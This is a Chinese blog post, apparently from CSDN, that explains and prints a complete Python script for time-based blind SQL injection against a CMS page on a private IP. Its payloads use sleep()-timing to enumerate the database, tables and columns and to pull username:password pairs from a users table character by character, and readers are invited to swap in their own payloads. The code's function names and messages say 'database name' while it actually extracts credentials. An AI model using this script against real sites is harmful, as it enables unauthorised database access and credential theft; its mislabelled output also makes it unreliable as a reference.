sql注入-自动化延时脚本

已于 2024-01-03 21:17:52 修改
阅读量486 收藏 10
点赞数 12
分类专栏: sql注入 文章标签: sql 自动化 数据库
于 2024-01-03 21:00:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58853680/article/details/135373040
版权

这段代码的主要目的是利用SQL注入攻击来获取目标数据库的名称。它通过发送带有特定payload参数的HTTP GET请求,结合响应时间判断是否存在预期的结果,以此实现盲注攻击。

以下是代码逻辑的详细分析:

  1. 定义基础信息:

    • BASE_URL:目标服务器的URL。
    • VULNERABLE_ENDPOINT:存在SQL注入漏洞的API端点。
    • USER_AGENT:模拟浏览器User-Agent字符串,用于伪装请求来源。
    • shellcode:一个包含不同SQL查询语句的列表,分别用于获取数据库名、所有表名、指定表的列名和用户名与密码拼接的记录。

  2. 定义timeout函数:

    • 该函数发送一个HTTP GET请求到指定URL,并设置超时时间为3秒。
    • 如果请求超时(即触发了sleep函数),则返回字符串"timeout";否则返回响应文本内容。

  3. 定义get_content_length函数:

    • 通过遍历范围内的长度值,构建payload尝试确定第四个SQL查询(用户与密码拼接)结果的长度。
    • 当检测到请求超时(触发了sleep函数),认为找到了正确的长度并返回。

  4. 定义get_database_name函数:

    • 根据上一步得到的长度值,逐个字符解析数据库名。
    • 使用盲注技术,尝试匹配每一个可打印字符是否为数据库名中的对应字符。
    • 当发现请求超时时,将当前字符添加到数据库名变量中,并实时显示已获取的部分数据库名。
    • 获取完整数据库名后返回。

  5. 主程序流程:

    • 调用get_content_length函数获取数据库名的长度。
    • 如果成功获取到了长度,则调用get_database_name函数以盲注方式获取数据库名并实时打印。
    • 若无法获取数据库名长度,则输出错误提示。

具体代码

可根据自己需要去修改payload


import requests

import string

"""



http://10.9.63.129/cms/show.php?id=33 and if(1=1,sleep(5),1)

"""

BASE_URL = "http://10.9.63.129/cms"

VULNERABLE_ENDPOINT = "/show.php"

USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36"



# 定义shellcode 方便更改payload语句

shellcode=[

"select database()",#数据库名

"select group_concat(table_name) from information_schema.tables where table_schema=database()",#表名

"select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='cms_users'",#表名

"select concat(username,':',password) from cms_users",

]

def timeout(url,payload):

try:

            res=requests.get(url=url,params=payload,headers={"User-Agent": USER_AGENT},timeout=3)

# print(res.text)

except requests.exceptions.ReadTimeout:

return "timeout"

else:

return res.text



def get_content_length():

    full_url=BASE_URL+VULNERABLE_ENDPOINT

for content_length in range(1,1000):

        payload = {

'id':f'33 and if(length(({shellcode[3]}))={content_length},sleep(5),1)'

}

# print(payload)

if "timeout" in timeout(full_url,payload):

break

return content_length  



def get_database_name(content_length):

    db_name = ""#数据库名

    full_url = BASE_URL + VULNERABLE_ENDPOINT#url

print("[+] 正在获取数据库名,请稍候...", end="\r")

for i in range(1, content_length + 1):

for c in string.printable.strip():

            payload = {'id': f"33 and if(substr(({shellcode[3]}),{i},1)='{c}',sleep(5),1)"}

# response = requests.get(full_url, params=payload, headers={"User-Agent": USER_AGENT})



if "timeout" in timeout(full_url,payload):

                db_name += c

print(f"[+] 已获取的数据库名为: {' ' * (content_length - len(db_name))}{db_name}", end="\r")

break

print(f"\n[+] 获取到的最终数据库名为: {db_name}")

return db_name or "无法获取数据库名"





# 获取数据库名长度

content_length = get_content_length()

if content_length is not None:

# 获取并实时打印数据库名

    get_database_name(content_length)

else:

print("[!] 无法确定数据库名长度")

青衣贼优秀
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本自动化这一过程。 SQL注入攻击主要有三种类型:直列注入...
SQL注入注入
qq_45557130的博客
10-07 1545
sql注入注入
sql注入-注入】sleep()、benchmark()函数 注入
07-10 7227
注入】结合if、case when 注入
sql注入:注入python万能脚本
一个努力学习网安的小牛马
11-08 262
【代码】sql注入:注入python脚本
python sql注入脚本(从数据库名到字段)
m0_61815757的博客
04-13 2677
python sql盲注脚本
sql注入间盲注脚本,mysql结构)
最新发布
2401_82760239的博客
04-04 517
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
sql盲注检测的简单脚本.zip
03-10
5. **检测脚本**:压缩包中的"sql注入检测"可能是用于自动化检测SQL盲注的脚本,它可能包含了一些探测技巧,如上述的异常响应和迟法。使用这类脚本,开发者或安全人员可以快速扫描网站,找出可能存在的SQL注入...
FindMeAJob:可以申请工作的自动化软件
03-16
考虑到自动化软件的安全性和隐私问题,"FindMeAJob"很可能遵循了一些最佳实践,如使用HTTPS协议进行安全的数据传输,对用户输入进行验证以防止XSS(跨站脚本攻击)和SQL注入,以及存储敏感信息如登录凭证采用加密...
BlindMap:Blindmap 是一种检测 MSSQL Server 上基于间的 sql 注入的工具
06-01
该工具利用了 MSSQL Server 的特定行为,例如查询或睡眠函数,来探测数据库是否对注入SQL 语句有响应,从而识别潜在的注入点。 **BlindMap 的工作原理** 1. **探测阶段**:BlindMap 会自动构造一系列的 SQL...
sqlmapproject-sqlmap-0.9-3907-g9c22555
12-15
SQLMap是一款著名的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞。它的全名是"sqlmapproject-sqlmap-0.9-3907-g9c22555",版本号为0.9,版本标识为3907-g9c22555,这通常是开发者的Git提交哈希值,表示...
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
SQL注入(注入)---zkaq
weixin_38237216的博客
04-11 4840
1.概念 1.注入:当进行盲注的候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个候就需要使用特定的间函数,通过查看web页面的返回间差来判断 2.常用函数 sleep() :将程序挂起一段间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
SQL - waitfor delay/time(SQL间的方法)
袭冷
03-30 5370
一、waitfor介绍     功能:指定触发语句块、存储过程或事务执行的间、间间隔或事件。     语法:WAITFOR { DELAY 'time' | TIME 'time' }     参数:DELAY:指等过了指定的间过去后再执行SQL。         TIME:指等到了指定的间点后再执行SQL。         'time':要等待的间。可以按 dat
sql迟执行
weixin_30326745的博客
12-22 733
SQL有定执行的语句WaitFor。 语法格式:waitfor {delay 'time'|time 'time'} delay后面的间是需要迟多长间后执行。 time后面的间是指定何执行,格式为'HH:MM:SS',不支持日期 例: --指定10:00执行 Begin waitfor time '10:00' select * from tablename e...
SQL Server 执行
chelen_jak的专栏
07-02 8134
参考: --方法1: Declare @t1 Varchar(8) Set @t1 = Convert(Varchar,DateAdd(ss, @Secnod, 0),108) WAITFOR DELAY @t1   --等待n秒 --方法2: Declare @t1 DateTime, @n int Select @t1 = GetDate(), @n = 0 While
sqli-labs第九关注入脚本
weixin_42750666的博客
04-01 668
import requests import string def timeOut(url): #判断是否 try: res=requests.get(url,timeout=3) return "No" except Exception as e: return "TimeOut" def get_dbNa...
SQL盲注(注入)
热门推荐
JKding123的博客
04-02 1万+
思路: *判断是否存在注入注入是字符型还是数字型 *猜解当前数据库名 *猜解数据库表名 *猜解字段名 *猜解数据 1判断注入类型 playload result 1’ and sleep(5) # 迟 1 and sleep(5)# 没有迟 存在字符型注入 2猜解当前数据库名 2.1猜解数据库名的长度: playload result 1’ and i...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值